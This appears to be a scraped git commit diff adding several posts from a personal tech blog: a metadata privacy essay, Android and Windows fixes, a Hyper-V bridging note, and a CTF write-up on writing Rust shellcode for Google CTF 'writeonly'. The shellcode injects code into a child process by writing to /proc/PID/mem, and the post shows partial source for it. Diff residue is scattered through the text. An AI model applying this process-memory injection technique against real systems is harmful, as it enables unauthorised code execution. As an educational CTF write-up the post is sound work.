title = "Setting up dynamic IPv4 endpoint update for tunnelbroker on Asuswrt-Merlin"
+++

This process should be simple and easy. It should be documented. Neither of these things are true.

The settings you want are:

With an update url from tunnelbroker looking like `https://you:asfkjherwrqsw@ipv4.tunnelbroker.net/nic/update?hostname=12345`,
@ -0,0 +1,27 @@

+++
author = "lf"
categories = ["software", "software-politics"]
date = 2019-03-31T01:14:29Z
description = ""
draft = false
path = "/blog/software-should-respect-the-users-privacy-and-inform-them-of-when-an-action-they-are-taking-may-compromise-it"
tags = ["software", "software-politics"]
title = "Software that respects users' privacy must inform them if they are going to compromise it"
featuredImage = "../images/fusionleak.png"
+++
Above is a STEP file from Autodesk Fusion 360. It contains personally identifiable information by default: it leaks their Autodesk username (in my case, my full name!) and a file path on the local computer, which could also contain the user's name as well as any other information they might have put in it. In this case, it identifies where a non-scrubbed version of this particular file is found. <!-- excerpt -->
|
||||||
|
|
||||||
|
Fusion 360 does not tell you that this information is there. It does not display it in the interface either.
|
||||||
|
|
||||||
|
This sort of metadata leaking is everywhere. For instance, I have no idea if I can get an email associated with the owner of a Google document if it is shared with me. It's not obvious if it is exposed in the UI, and if it is not, perhaps an API exposes it. This sort of issue is particularly insidious because it makes it easier to use a platform to conduct doxing attacks and makes it unclear whether people whose identities need to remain private can use a service.
|
||||||
|
|
||||||
|
Metadata is more interesting than the data itself. This is a central concept in the NSA's phone surveillance: the content of a call can be surmised particularly easily by a computer simply by considering origin, destination and duration.
|
||||||
|
|
||||||
|
The primary data in a file is usually generated entirely by the user and is very unlikely to contain any PII unless they put it there themselves. Metadata, on the other hand, is frequently computer generated, is hard to inspect relative to the data itself (usually hiding in dialogs in dusty corners of the user interface, if it is exposed at all), and is likely to contain information about the user and their computer.

If you are writing a program which generates files or other information which will be shared, *please* consider what you store as metadata with it. Do not store local paths from the user's computer in the file, because they may compromise the user's privacy. *Show* the user what metadata is on the file when they are saving it. Everywhere in the interface where taking some action may reveal information as metadata to someone else, include a small block of text indicating what that information is and why it needs to be collected. Similarly to how [rubber duck debugging](https://en.wikipedia.org/wiki/Rubber_duck_debugging) works, you may notice while writing that statement that you don't need to expose some of the information. As much as Apple is a company harmful to the environment and to users' ownership of their devices, I have to commend them on their choice to include a small privacy icon wherever the user is agreeing to provide some information in the provision of a service.

These metadata issues are something which really made me realize how fortunate and privileged I am to be in a situation where having my name published with CAD files is at worst annoying. I can think of several people I know online for whom it would be catastrophic, and they are all from groups which have been, and continue to be, discriminated against in society. A team with people from those groups on it is far more likely to notice this type of privacy issue and give it the priority it deserves.

@@ -0,0 +1,24 @@
+++
author = "lf"
categories = ["android", "cyanogenmod", "oneplus"]
date = 2016-03-04T05:08:07Z
description = ""
draft = false
path = "/blog/swapping-back-and-menuoverview-buttons-on-android-2"
tags = ["android", "cyanogenmod", "oneplus"]
title = "Swapping Back and Menu/Overview buttons on Android"
+++

I use a OnePlus One as my daily driver. Unfortunately, like nearly every phone on the market with capacitive buttons, its buttons are *backwards*! I could enable software keys, but that would be admitting defeat. CyanogenMod doesn't allow swapping the keys in its settings, because doing so would result in some pretty horrible user experience.

None of this matters, however, because this is *Android*, and I have root:

In `/system/usr/keylayout/Generic.kl`, you can see the key mapping for every key on the system. Simply swap the entries in the rightmost column: `BACK` and `MENU`.

MENU is at `key 139` and BACK is at `key 158`.
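
After the swap, the relevant lines of `Generic.kl` should look something like this (a sketch; any surrounding flags vary by device):

```
# /system/usr/keylayout/Generic.kl, after swapping the labels
key 139   BACK
key 158   MENU
```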

I use this on the latest Cyanogen OS, based on Lollipop, and it works perfectly. To revert, simply swap the entries back.

A little note: my blog is just stuff I need to write down for easy reference later. It covers completely random topics, although centered around technology. I should probably make a wiki for this stuff.

16
content/posts/the-road-to-ethical-iot.md
Normal file
@@ -0,0 +1,16 @@
+++
author = "lf"
date = 2018-11-08T13:55:26Z
description = ""
draft = true
path = "/blog/the-road-to-ethical-iot"
title = "The Road to Ethical IoT"

+++

I very much subscribe to Stallman's idea that the Internet of Stings is an oppression system, but there are also obvious benefits to making more things available for computers to automate.

The schism that currently exists between those two camps is largely because many IoT devices are fiercely proprietary and don't truly belong to the user, horrifying free software advocates. To make it worse, even those who find the lack of ownership acceptable detest the massive number of security issues in these systems, caused by their code being quickly and poorly written, with development credentials or backdoors left intact at release.

Something must be done. An ethical IoT device must respect the user, first and foremost. Custom firmware should be allowed and encouraged, though perhaps only after flipping a switch on the physical device, so that malware can't take advantage of it. Network communication must go through an audited outer layer which throws out any packet that is invalid or encrypted with the wrong key. An example of such a layer is WireGuard.

20
content/posts/vundle-y-u-do-dis.md
Normal file
@@ -0,0 +1,20 @@
+++
author = "lf"
categories = ["vim"]
date = 2015-01-18T05:43:30Z
description = ""
draft = false
path = "/blog/vundle-y-u-do-dis"
tags = ["vim"]
title = "Vundle, y u do dis"

+++

To start off with: I apparently can't read, and I feel quite stupid for wasting 30 minutes of my life messing with this problem.

Recently, I decided that vim was a good idea, so I committed to not avoiding it in favor of Sublime Text (I still need to fix the HTML stuff so that using Sublime isn't so damn tempting), and the editor switch has been going well.

When I decided to stop stealing someone else's vimrc, I also switched from Pathogen to Vundle. This threw a slew of strange errors *not even mentioning a shell*, such as `Error detected while processing function vundle#installer#new..vundle#scripts#view:`. Googling this gave me a seemingly completely unrelated issue from 2010 (typical as of late, sadly). After trying a few things like deleting `.vim/bundle`, nothing seemed to work, so I went off to read the docs. After messing with the GitHub wiki, I realised that I'm a derp and should read properly: there was a section clearly labeled `I don't use a POSIX Shell (i.e. Bash/Sh)` covering exactly this.

That said, this isn't a totally useless I'm-an-idiot post, because gmarik could do something better. Vundle could detect the capabilities it requires, so that there's a pleasant error message stating what went wrong, rather than the current state of throwing a 20-line error entirely lacking any description of **what** failed, and where. This is also partially vim's problem: it could state that an error happened while executing shell code, or similarly useful things.

18
content/posts/why-do-my-bridges-not-work-1-one.md
Normal file
@@ -0,0 +1,18 @@
+++
author = "lf"
categories = ["homelab", "hyper-v", "lxd", "containers", "networking"]
date = 2016-06-24T22:55:33Z
description = ""
draft = false
path = "/blog/why-do-my-bridges-not-work-1-one"
tags = ["homelab", "hyper-v", "lxd", "containers", "networking"]
title = "Human error is the root of all problems, especially with network bridges"

+++

When in doubt, the problem is directly caused by one's own stupidity.

I was trying to run an LXD host in a Hyper-V VM and went to set up bridged networking (in this case, *notworking*). Twice. The good old rule that it's caused by my own stupidity rang very true: the problem was that the VM's network adapter wasn't allowed to change the MAC address on its packets. The toggle is in the VM properties, under the advanced settings child node of the NIC.
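
For reference, the same toggle can be flipped from an elevated PowerShell prompt on the Hyper-V host (the VM name below is a placeholder for illustration):

```powershell
# Let the guest send frames with source MACs other than its own,
# which bridging inside the guest requires.
Set-VMNetworkAdapter -VMName "lxd-host" -MacAddressSpoofing On
```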

This is why you should have a routed network.

18
content/posts/windows-folder-extremely-slow-to-load.md
Normal file
@@ -0,0 +1,18 @@
+++
author = "lf"
categories = ["windows", "small-fixes"]
date = 2016-06-28T21:38:26Z
description = ""
draft = false
path = "/blog/windows-folder-extremely-slow-to-load"
tags = ["windows", "small-fixes"]
title = "Windows folder extremely slow to load"

+++

Due to some weirdness, presumably thumbnail rendering, a folder set to "Optimize for Pictures" takes 10+ times as long as it should to load. This was happening with my Downloads folder, and it seemed to only apply when the folder was accessed through "This PC".

Anyway, to fix it: in the properties of the folder in question, under "Customize", change "Optimize this folder for:" to "General Items" and it will load much faster.

{{ image(name="slowfolder.png", alt="screenshot of the customize folder dialog demonstrating the change") }}

171
content/posts/writeonly-in-rust.md
Normal file
@@ -0,0 +1,171 @@
+++
date = "2020-09-01"
draft = false
path = "/blog/writeonly-in-rust"
tags = ["ctf", "rust", "osdev"]
title = "Writing shellcode in Rust"
+++

In my [Google CTF entry for `writeonly` this year](https://lfcode.ca/blog/gctf-2020-writeonly),
I wrote my first-stage shellcode in C, which was somewhat novel in and of
itself, as it seemed that few people were willing to brave linker scripts to be
able to write shellcode in C. My hubris does not stop at C, however, and the
crab language seemed well suited for a port.

[Source code here](https://github.com/lf-/ctf/tree/main/writeonly.rs)
As with the previous C implementation, what we are doing with this particular
CTF challenge is fundamentally the same thing operating system kernels do: get
loaded into memory with `memcpy`, then get jumped to without any real setup.

The first step was figuring out how to generate an executable with nothing in
it. I consulted [an OS dev guide](https://os.phil-opp.com/freestanding-rust-binary/)
for how to do this, and we do essentially the same thing here, but add our own
section attribute to make sure the linker places the function correctly.

`src/main.rs`:

```rust
#![no_std]
#![no_main]

#[panic_handler]
fn panic(_: &core::panic::PanicInfo) -> ! {
    loop {}
}

#[no_mangle]
#[link_section = ".text.prologue"]
pub extern "C" fn _start() -> ! {
    loop {}
}
```

-----

The next step was to set up Cargo. A trivial `Cargo.toml` is written, with
`panic = "abort"` set to avoid pulling in any unwinding machinery. `opt-level = "z"`
initially ballooned my code size, but after turning on LTO
[on the advice of a Rust size optimization guide](https://github.com/johnthagen/min-sized-rust),
I got a massive win in code size, for the first time getting under 255 bytes.

`Cargo.toml`:

```toml
[package]
name = "shellcode"
edition = "2018"
version = "0.0.0"

[profile.dev]
panic = "abort"

[profile.release]
panic = "abort"
# these two cut code size by 2/3
opt-level = "z"
lto = true
```

[`.cargo/config.toml`](https://doc.rust-lang.org/cargo/reference/config.html):

```toml
[build]
rustflags = ["-C", "link-arg=-nostdlib", "-C", "link-arg=-static", "-C", "link-arg=-Wl,-Tshellcode.ld,--build-id=none"]
```

Internally, on Linux, Rust invokes `gcc` as its linker driver, so I took the
meaningful gcc linking-stage flags from the C version, ported them directly
over, and they just worked.

-----

Back to programming: I needed system calls. After very briefly considering
using a libc to deal with this and throwing the idea out over code size
concerns, I just grabbed the same assembly routines from the C implementation.
Rust has a [really nice inline asm syntax](https://github.com/rust-lang/rfcs/blob/master/text/2873-inline-asm.md)
which makes asm declarations clearer, and it also has far better error messages
than Clang or GCC provide with their respective assemblers, so this required
only a slight bit of porting.

```rust
unsafe fn syscall2(scnum: u64, arg1: u64, arg2: u64) -> u64 {
    let ret: u64;
    asm!(
        "syscall",
        in("rax") scnum,
        in("rdi") arg1,
        in("rsi") arg2,
        out("rcx") _,
        out("r11") _,
        lateout("rax") ret,
        options(nostack),
    );
    ret
}
```

Compare to the C equivalent:

```c
static inline long syscall2(long n, long a1, long a2)
{
    unsigned long ret;
    __asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2) : "rcx", "r11", "memory");
    return ret;
}
```

which uses hard-to-see colons as delimiters for the input, output, and clobber
lists, plus shortened single-character names for the registers, which are
sometimes capitalized when two registers share a letter, e.g. `rdx` and `rdi`.
Also, if you're using Clang, there is no way to use Intel syntax for inline
assembly.

-----

The final step was to port the shellcode itself, which needs to steal the child
PID from its caller's stack, build a path to `/proc/1234/mem` (where 1234 is
the child PID), then call `open(2)`, `lseek(2)`, and finally `write(2)`. I got
most of the way through a direct port, struggling a little with string
manipulation in fixed stack buffers, until someone on the Rust Discord pointed
out that extra slashes in paths are discarded, allowing a special `itoa`
function to be written that simply overwrites the path in place.

Specifically, it's possible to just do this:

```rust
let mut buf: [u8; 21] = *b"/proc////////////mem\0";
// start writing here ^
my_itoa(pid, &mut buf[6..16]);
```

and not worry about the extra slashes, which will be ignored. This lets the
`itoa` implementation avoid reversing the string, simply by writing from the
end of the buffer towards the start, and it cut the code size in half by
avoiding dynamic string construction.
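
Such an in-place `itoa` can be sketched like this (a hosted-Rust sketch for illustration; the actual `my_itoa` in the linked repo is `no_std` and may differ in detail):

```rust
/// Write `n` in decimal into `buf`, right-aligned. Bytes to the left of the
/// most significant digit are left untouched, so they keep their '/' filler.
fn my_itoa(mut n: u64, buf: &mut [u8]) {
    let mut i = buf.len();
    loop {
        i -= 1;
        buf[i] = b'0' + (n % 10) as u8;
        n /= 10;
        if n == 0 {
            break;
        }
    }
}

fn main() {
    let mut buf: [u8; 21] = *b"/proc////////////mem\0";
    my_itoa(1234, &mut buf[6..16]);
    // The kernel collapses repeated slashes, so this still opens /proc/1234/mem.
    assert_eq!(&buf[..], &b"/proc///////1234/mem\0"[..]);
}
```

Because the digits are emitted from the end of the slice backwards, no reversal pass is needed.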

The rest of the shellcode was essentially the same as the C implementation,
which I also ported to this trick, out of interest in comparing code sizes.

-----
## Results

Rust: 168 bytes of code

C: 157 bytes of code

I have not dug further into why Rust produces an extra 11 bytes of code. I
believe this result demonstrates that Rust can indeed be used to write simple
shellcode payloads with the same fitness for purpose as C; however, at the size
and level of complexity tested, nothing can be concluded about the relative
developer productivity of the two languages for this application.

One annoying disadvantage of Rust is that I can't just `#include
<sys/syscall.h>` or other headers and get the various constants used in system
calls. It was not difficult to write a short C program to print these numbers,
but it wouldn't have been necessary in a C payload.
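
In the meantime, hardcoding the numbers works; these are the standard x86_64 Linux values (from `asm/unistd_64.h`) for the three calls the payload makes:

```rust
// x86_64 Linux syscall numbers (asm/unistd_64.h) used by the payload.
const SYS_WRITE: u64 = 1;
const SYS_OPEN: u64 = 2;
const SYS_LSEEK: u64 = 8;

fn main() {
    // These stand in for the constants <sys/syscall.h> would provide in C.
    assert_eq!((SYS_WRITE, SYS_OPEN, SYS_LSEEK), (1, 2, 8));
}
```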
|
||||||
Loading…
Add table
Add a link
Reference in a new issue